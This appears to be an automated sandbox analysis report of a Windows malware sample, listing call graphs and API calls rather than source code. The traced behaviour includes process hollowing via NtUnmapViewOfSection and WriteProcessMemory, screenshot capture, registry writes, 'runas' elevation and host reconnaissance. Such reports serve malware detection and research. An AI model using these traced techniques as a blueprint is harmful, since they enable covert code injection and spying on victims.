19425->19429 19428 41c830 __dosmaperr 14 API calls 19426->19428 19427->19429 19431 41c830 __dosmaperr 14 API calls 19427->19431 19430 41fb98 19428->19430 19429->19411 19432 41cd0c __wsopen_s 25 API calls 19430->19432 19431->19430 19432->19429 19433->19418 19435 41d3cb 19434->19435 19439 41d397 19434->19439 19436 41d3e2 19435->19436 19437 41e681 _free 14 API calls 19435->19437 19438 41e681 _free 14 API calls 19436->19438 19437->19435 19438->19439 19439->19283 19441 416b80 27 API calls 19440->19441 19442 40b35d 19441->19442 19443 402c70 69 API calls 19442->19443 19444 40b368 GetTempPathA 19443->19444 19445 40b3b0 19444->19445 19445->19445 19446 417040 27 API calls 19445->19446 19447 40b3cc 19446->19447 19448 417190 27 API calls 19447->19448 19449 40b3e2 19448->19449 19450 416b80 27 API calls 19449->19450 19451 40b4a6 19450->19451 19452 402c70 69 API calls 19451->19452 19453 40b4b1 19452->19453 19454 417510 27 API calls 19453->19454 19455 40b4cd 19454->19455 19456 417190 27 API calls 19455->19456 19457 40b4e2 GetModuleFileNameA 19456->19457 19459 40b5d0 19457->19459 19459->19459 19460 417040 27 API calls 19459->19460 19461 40b5ec 19460->19461 19462 40b802 19461->19462 19464 40b8b7 19461->19464 19463 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 19462->19463 19465 40b824 19463->19465 19466 41cd1c 25 API calls 19464->19466 19465->19111 19467 40b8bc 19466->19467 19469 40aee6 19468->19469 19470 40b1b0 19469->19470 19471 416b80 27 API calls 19469->19471 19472 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 19470->19472 19473 40af05 19471->19473 19474 40b1c6 19472->19474 19475 402c70 69 API calls 19473->19475 19492 40a800 GetModuleFileNameA 19474->19492 19476 40af0c 19475->19476 19477 416b80 27 API calls 19476->19477 19478 40af24 19477->19478 19479 402c70 69 API calls 19478->19479 19480 40af2b 19479->19480 19481 416b80 27 API calls 19480->19481 19482 40af58 19481->19482 19483 402c70 69 API calls 19482->19483 19484 40af63 19483->19484 19484->19470 19485 40b1ca 19484->19485 19522 417180 19485->19522 19493 40a866 19492->19493 19493->19493 19494 417040 27 API calls 19493->19494 19495 40a882 19494->19495 19496 416b80 27 API calls 19495->19496 19497 40ac16 19496->19497 19498 402c70 69 API calls 19497->19498 19499 40ac21 19498->19499 19500 416b80 27 API calls 19499->19500 19501 40ac3a 19500->19501 19536 405a60 19501->19536 19504 416b80 27 API calls 19505 40ac5c 19504->19505 19506 402c70 69 API calls 19505->19506 19507 40ac67 19506->19507 19508 417190 27 API calls 19507->19508 19509 40ac7b 19508->19509 19510 417190 27 API calls 19509->19510 19511 40ac8b 19510->19511 19512 416b80 27 API calls 19511->19512 19513 40aca9 19512->19513 19514 402c70 69 API calls 19513->19514 19515 40acb0 19514->19515 19516 417040 27 API calls 19515->19516 19517 40acd3 19516->19517 19547 4043c0 19517->19547 19519 40acdc 19520 41cd1c 25 API calls 19519->19520 19521 40ae42 19520->19521 19525 418212 19522->19525 19530 418186 19525->19530 19528 4194c4 std::_Xinvalid_argument RaiseException 19529 418231 19528->19529 19533 4180a7 19530->19533 19534 419289 ___std_exception_copy 26 API calls 19533->19534 19535 4180d3 19534->19535 19535->19528 19539 405ab8 19536->19539 19546 405bca 19536->19546 19537 416b80 27 API calls 19537->19539 19538 402c70 69 API calls 19538->19539 19539->19537 19539->19538 19540 405c00 19539->19540 19541 417040 27 API calls 19539->19541 19543 405c05 19539->19543 19539->19546 19542 417180 27 API calls 19540->19542 19541->19539 19542->19543 19544 41cd1c 25 API calls 19543->19544 19545 405c0a 19544->19545 19546->19504 19548 404404 19547->19548 19549 417040 27 API calls 19548->19549 19550 40442a ShellExecuteA 19549->19550 19551 404493 19550->19551 19552 40450d 19551->19552 19553 41cd1c 25 API calls 19551->19553 19552->19519 19554 40452e 19553->19554 19555 416b80 27 API calls 19554->19555 19556 404567 19555->19556 19557 416b80 27 API calls 19556->19557 19558 404580 19557->19558 19559 416b80 27 API calls 19558->19559 19560 404593 19559->19560 19561 4043c0 27 API calls 19560->19561

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 128 41b9e1-41b9ee call 41dfe2 131 41ba10-41ba1c call 41ba23 ExitProcess 128->131 132 41b9f0-41b9fe GetPEB 128->132 132->131 133 41ba00-41ba0a GetCurrentProcess TerminateProcess 132->133 133->131
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(0041F030,?,0041B9E0,0041BF66,?,0041F030,0041BF66,0041F030), ref: 0041BA03
                                                                • TerminateProcess.KERNEL32(00000000,?,0041B9E0,0041BF66,?,0041F030,0041BF66,0041F030), ref: 0041BA0A
                                                                • ExitProcess.KERNEL32 ref: 0041BA1C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: 3d3398b3f9dcf73c51e1cd00535af5d0e13f2263922661259b1695b405c8b0d4
                                                                • Instruction ID: be758b5f3a38b2d93a3fbedb321d5b13915e36e10b2adafe3a414c7c05e9fbd7
                                                                • Opcode Fuzzy Hash: 3d3398b3f9dcf73c51e1cd00535af5d0e13f2263922661259b1695b405c8b0d4
                                                                • Instruction Fuzzy Hash: 3BE0B631240108EFCB216F55DC49AA97B79FF45785FD4443AF80696231CB39EDA2CB88
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 136 4043c0-404465 call 417e80 call 417040 ShellExecuteA 141 404493-4044ed 136->141 143 404517-404528 141->143 144 4044ef-4044fb 141->144 145 40450d-404514 call 4186bf 144->145 146 4044fd-40450b 144->146 145->143 146->145 148 404529-40459a call 41cd1c call 416b80 * 3 call 4043c0 146->148
                                                                APIs
                                                                • ShellExecuteA.SHELL32(00000000,000000FF,?,?,00000000,00000000), ref: 00404454
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: runas
                                                                • API String ID: 587946157-4000483414
                                                                • Opcode ID: f8419775caa034be66f9eaaefdeaedb4b6375cd623adbc6f2410fdb337acd2b8
                                                                • Instruction ID: e6e0ab57cb9d62481e4135255265b3591b272f3c45fb97704a701dae2dbdd878
                                                                • Opcode Fuzzy Hash: f8419775caa034be66f9eaaefdeaedb4b6375cd623adbc6f2410fdb337acd2b8
                                                                • Instruction Fuzzy Hash: 0441F471200208EBDB08DF29CC42BDD7BB5EB89314F90822EFD15572C1D7799984CB85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 202 6e466e-6e4687 203 6e4689-6e468b 202->203 204 6e468d 203->204 205 6e4692-6e469e CreateToolhelp32Snapshot 203->205 204->205 206 6e46ae-6e46bb Module32First 205->206 207 6e46a0-6e46a6 205->207 208 6e46bd-6e46be call 6e432d 206->208 209 6e46c4-6e46cc 206->209 207->206 212 6e46a8-6e46ac 207->212 213 6e46c3 208->213 212->203 212->206 213->209
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006E4696
                                                                • Module32First.KERNEL32(00000000,00000224), ref: 006E46B6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 006E3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6e3000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 3833638111-0
                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                • Instruction ID: 2702f0f7929d685c6d0e1cb63ce97f7211bbee1cad2916e77fc1c9ff2f558d75
                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                • Instruction Fuzzy Hash: 41F096311017607BD7203BF6988DBAE77EDAF4A725F100528E646911C0DF70EC454A65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00423398: CreateFileW.KERNELBASE(00000000,00000000,?,00423788,?,?,00000000,?,00423788,00000000,0000000C), ref: 004233B5
                                                                • GetLastError.KERNEL32 ref: 004237F3
                                                                • __dosmaperr.LIBCMT ref: 004237FA
                                                                • GetFileType.KERNELBASE(00000000), ref: 00423806
                                                                • GetLastError.KERNEL32 ref: 00423810
                                                                • __dosmaperr.LIBCMT ref: 00423819
                                                                • CloseHandle.KERNEL32(00000000), ref: 00423839
                                                                • CloseHandle.KERNEL32(0041E51E), ref: 00423986
                                                                • GetLastError.KERNEL32 ref: 004239B8
                                                                • __dosmaperr.LIBCMT ref: 004239BF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID: H
                                                                • API String ID: 4237864984-2852464175
                                                                • Opcode ID: 1ce13e6fd8c28752e2ddd2a23a2d287ae7b2b8bd4a2202f9c8fd90ddaa5a1295
                                                                • Instruction ID: b003a15c628702d40cfbcecca9f7353160345fca733c1857a0ba88a793590157
                                                                • Opcode Fuzzy Hash: 1ce13e6fd8c28752e2ddd2a23a2d287ae7b2b8bd4a2202f9c8fd90ddaa5a1295
                                                                • Instruction Fuzzy Hash: 5DA12772B001548FCF19EF68EC917AE3BB0AB46315F54016EE811AF391C73C9956CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040B5A5
                                                                • GetFileAttributesA.KERNELBASE(?), ref: 0040B6CE
                                                                • CreateDirectoryA.KERNELBASE(?,00000000), ref: 0040B6F0
                                                                • GetFileAttributesA.KERNELBASE(?), ref: 0040B70B
                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B84C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Attributes$CopyCreateDirectoryModuleName
                                                                • String ID:
                                                                • API String ID: 3597215635-0
                                                                • Opcode ID: 024742293ffed2c4d1b096372f012befa9f15729bf6a28dbadd2771e5fa00857
                                                                • Instruction ID: a934ae8864a8a92cf458129f686f6532dc9d655bac45d23393913fe995afb105
                                                                • Opcode Fuzzy Hash: 024742293ffed2c4d1b096372f012befa9f15729bf6a28dbadd2771e5fa00857
                                                                • Instruction Fuzzy Hash: ABC1A0B1A001188BDB24DB28CD45BDDB775EB85318F5041EDE608A72D2DB399EC48FAD
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040B380
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: PathTemp
                                                                • String ID:
                                                                • API String ID: 2920410445-0
                                                                • Opcode ID: ea1981e3b141d83fb6103c5473e1a89cfe22a810ca1df3825568cdc430fcf6c5
                                                                • Instruction ID: bed9f8206c10bc8b9bce4702bc0fd31eb9ca90d6bfc227a2c69e117914f0a7e9
                                                                • Opcode Fuzzy Hash: ea1981e3b141d83fb6103c5473e1a89cfe22a810ca1df3825568cdc430fcf6c5
                                                                • Instruction Fuzzy Hash: 4981ADB09042588BEB24DB24CD49BDDBB75EB46308F5041E9D60967282DB791FC8CFAD
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 215 41d29b-41d2a2 216 41d2a4-41d2a6 215->216 217 41d2a7-41d2ae call 4216e4 call 421a85 215->217 221 41d2b3-41d2b7 217->221 222 41d2b9-41d2bc 221->222 223 41d2be-41d2c7 call 41d2ee 221->223 224 41d2e2-41d2ed call 41e681 222->224 229 41d2c9-41d2cc 223->229 230 41d2ce-41d2d5 223->230 231 41d2da-41d2e1 call 41e681 229->231 230->231 231->224
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 070986772703c49f61cb72b087b7edc152cdddff0d7a34cc63ab41e9aac740e6
                                                                • Instruction ID: bc64b5865b7facb123b77b9705bce858cb6c599d8b3197de4276bb24e22b1475
                                                                • Opcode Fuzzy Hash: 070986772703c49f61cb72b087b7edc152cdddff0d7a34cc63ab41e9aac740e6
                                                                • Instruction Fuzzy Hash: 2BE0E572E4151046A211663B7C826EA12819BA1335B66036BF830C61E0DE7CC8C3C19E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 234 41e4df-41e505 call 41e2b5 237 41e507-41e519 call 4236bf 234->237 238 41e55e-41e561 234->238 240 41e51e-41e523 237->240 240->238 241 41e525-41e55d 240->241
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __wsopen_s
                                                                • String ID:
                                                                • API String ID: 3347428461-0
                                                                • Opcode ID: f62d859c7d7b0a6acea26fe1d68693355716faee68629b54b87d77f67d7d14cf
                                                                • Instruction ID: ce8e01f743ae20a0c0fe29bb830e78455a7054db18d70cfb659f0bb38e409b45
                                                                • Opcode Fuzzy Hash: f62d859c7d7b0a6acea26fe1d68693355716faee68629b54b87d77f67d7d14cf
                                                                • Instruction Fuzzy Hash: DA114875A0020AAFCF05DF59E9459CB7BF9EF48304F0040AAF809EB351D630DA11CBA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 242 423651-423685 call 41be10 call 41bd70 247 423687-42368a 242->247 248 42368c-4236a1 call 4236df 242->248 250 4236ab-4236af 247->250 251 4236a6-4236a9 248->251 252 4236b1-4236b9 call 41e681 250->252 253 4236ba-4236be 250->253 251->250 252->253
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: c2b94324b76974fa70c08e77f0004f35c50b01f950a964b6aced5bf47f6222ec
                                                                • Instruction ID: 3ab1820d02a1fa658bed966c189bcd3389873c348444ff9d80816312c0ac3dbe
                                                                • Opcode Fuzzy Hash: c2b94324b76974fa70c08e77f0004f35c50b01f950a964b6aced5bf47f6222ec
                                                                • Instruction Fuzzy Hash: 12017172D0015DBFCF01AFA99C019DE7FB9AB08314F54016ABD14E2251E7398A619B84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040B320: GetTempPathA.KERNEL32(00000104,?), ref: 0040B380
                                                                  • Part of subcall function 0040A800: GetModuleFileNameA.KERNEL32(00000000,?,00000104,E64E1EA0), ref: 0040A83C
                                                                  • Part of subcall function 00406530: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406560
                                                                  • Part of subcall function 00413980: IsUserAnAdmin.SHELL32 ref: 004139DD
                                                                  • Part of subcall function 00413980: GetUserNameA.ADVAPI32(?,?), ref: 00413A87
                                                                  • Part of subcall function 00413980: GetComputerNameExW.KERNEL32(00000002,?,?,?,?), ref: 00413AF0
                                                                  • Part of subcall function 004168D0: CreateThread.KERNEL32 ref: 004168E6
                                                                  • Part of subcall function 004168D0: CreateThread.KERNEL32 ref: 004168F7
                                                                  • Part of subcall function 004168D0: CreateThread.KERNEL32 ref: 00416908
                                                                  • Part of subcall function 004168D0: Sleep.KERNEL32(00007530,?,00416963), ref: 00416915
                                                                • InternetCloseHandle.WININET(00000000), ref: 00416977
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Name$CreateThread$FileModuleUser$AdminCloseComputerHandleInternetPathSleepTemp
                                                                • String ID:
                                                                • API String ID: 1327835013-0
                                                                • Opcode ID: ce3172d2dd1f93e9426762af1df5d4a2dceb2f79cf41b9e844b715903be985f4
                                                                • Instruction ID: 471d55ff78aef345f110b23e9f8e19a4b2b64315c001f99601888288eff9d463
                                                                • Opcode Fuzzy Hash: ce3172d2dd1f93e9426762af1df5d4a2dceb2f79cf41b9e844b715903be985f4
                                                                • Instruction Fuzzy Hash: 8DE04FB2A1010447CA0437BA5D0779E31184F4030CF90017EB815622D3ED7D896485FF
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 275 423398-4233bc CreateFileW
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00423788,?,?,00000000,?,00423788,00000000,0000000C), ref: 004233B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 5f6f20da4e93aca7bdcb0ea2359822fb329caed46e02a9c52ac097750241beb4
                                                                • Instruction ID: cd0ee65043cc83d888fb6f456493c6bde9bec702db69a9442c4f6e90f97d0004
                                                                • Opcode Fuzzy Hash: 5f6f20da4e93aca7bdcb0ea2359822fb329caed46e02a9c52ac097750241beb4
                                                                • Instruction Fuzzy Hash: 77D06C3210010DFFDF128F84DC06EDA3BAAFB48724F414120BA1856020C732E872EB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 276 6e432d-6e4367 call 6e4640 279 6e4369-6e439c VirtualAlloc call 6e43ba 276->279 280 6e43b5 276->280 282 6e43a1-6e43b3 279->282 280->280 282->280
                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006E437E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 006E3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6e3000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                • Instruction ID: 50c2cb180fe986287deb29f78ee9cbfb96b2a0223d10abddf477c8f71c9f2b7c
                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                • Instruction Fuzzy Hash: B2113C79A00208EFDB01DF99C989E98BBF5AF08350F058094F9489B362D771EE50DF80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,E64E1EA0,E64E1EA0), ref: 00402E1C
                                                                • RegQueryValueExA.ADVAPI32(E64E1EA0,?,00000000,00000000,?,00000400,?,?,00000000,00000001,E64E1EA0,E64E1EA0), ref: 00402E4A
                                                                • RegCloseKey.ADVAPI32(E64E1EA0,?,?,00000000,00000001,E64E1EA0,E64E1EA0), ref: 00402E56
                                                                • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 00402F63
                                                                • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00402F91
                                                                • RegCloseKey.ADVAPI32(80000001), ref: 00402F9A
                                                                • GdiplusStartup.GDIPLUS(?,?,00000000,E64E1EA0), ref: 004030CA
                                                                • GetDC.USER32(00000000), ref: 004031C2
                                                                • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 00403449
                                                                • GetSystemMetrics.USER32 ref: 004034A2
                                                                • GetSystemMetrics.USER32 ref: 004034AB
                                                                • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 004034F3
                                                                • GetSystemMetrics.USER32 ref: 00403546
                                                                • GetSystemMetrics.USER32 ref: 0040354F
                                                                • CreateCompatibleDC.GDI32(?), ref: 0040355B
                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403570
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00403580
                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004035A6
                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 004035BA
                                                                • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 004035D6
                                                                • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00403603
                                                                • GdipSaveImageToFile.GDIPLUS(00000000,?,?,00000000), ref: 00403687
                                                                • SelectObject.GDI32(00000000,?), ref: 00403694
                                                                • DeleteObject.GDI32(00000000), ref: 004036A1
                                                                • DeleteObject.GDI32(?), ref: 004036A9
                                                                • ReleaseDC.USER32 ref: 004036B3
                                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 004036BA
                                                                • GdiplusShutdown.GDIPLUS(?), ref: 0040375C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Gdip$ImageMetricsObjectSystemValue$Create$BitmapCloseCompatibleDeleteEncodersGdiplusOpenSelect$DisposeFileFromQueryReleaseSaveShutdownSizeStartup
                                                                • String ID: PrMs$image/jpeg
                                                                • API String ID: 406439762-3479922604
                                                                • Opcode ID: cbad7aefd740635331b2b6a70ce24ac8fd3da5491632943434d52950e8c2462d
                                                                • Instruction ID: 2fda29453dd7343fb8c030473094154efff91a55b42e6451fe4c8a82b38e2d13
                                                                • Opcode Fuzzy Hash: cbad7aefd740635331b2b6a70ce24ac8fd3da5491632943434d52950e8c2462d
                                                                • Instruction Fuzzy Hash: E3620571A001089BEB28DF28CD85BEDBB75EF45304F50826EE405B72D2DB799AC5CB58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403FD6
                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040403B
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00404054
                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0040406F
                                                                • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00404093
                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 004040AE
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004040B5
                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 004040DD
                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004040FE
                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 00404142
                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 0040417E
                                                                • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 0040419A
                                                                • ResumeThread.KERNEL32(?,?,?,00000000), ref: 004041A6
                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 004041B4
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004041D5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                • API String ID: 4033543172-1522589568
                                                                • Opcode ID: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
                                                                • Instruction ID: a9cd7b4eca6fd75c363069a252156244f2b8a6c1c24f95c61792526d0bff3807
                                                                • Opcode Fuzzy Hash: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
                                                                • Instruction Fuzzy Hash: 25517C71640218AFDB219F50DC49FEAB7B4FF48705F9000B6F608AA2D1D7B16995CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 00405EB0: GetTempPathA.KERNEL32(00000104,?,E64E1EA0,00000000), ref: 00405EF7
                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00407713
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFilePathTemp
                                                                • String ID:
                                                                • API String ID: 3199926297-0
                                                                • Opcode ID: eea6bb1b734c3121222496a57545cd887b208170903fa6436dd80bd7f45252dc
                                                                • Instruction ID: dec4cfc0129ff26472fd7fa9380305b0dab6103dd60af6cd80f4d959d1863cd7
                                                                • Opcode Fuzzy Hash: eea6bb1b734c3121222496a57545cd887b208170903fa6436dd80bd7f45252dc
                                                                • Instruction Fuzzy Hash: 3D62F870E04248DBEF14EBA8CA497DE7BB1AF06314F64416ED450773C2D7791A84CBAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

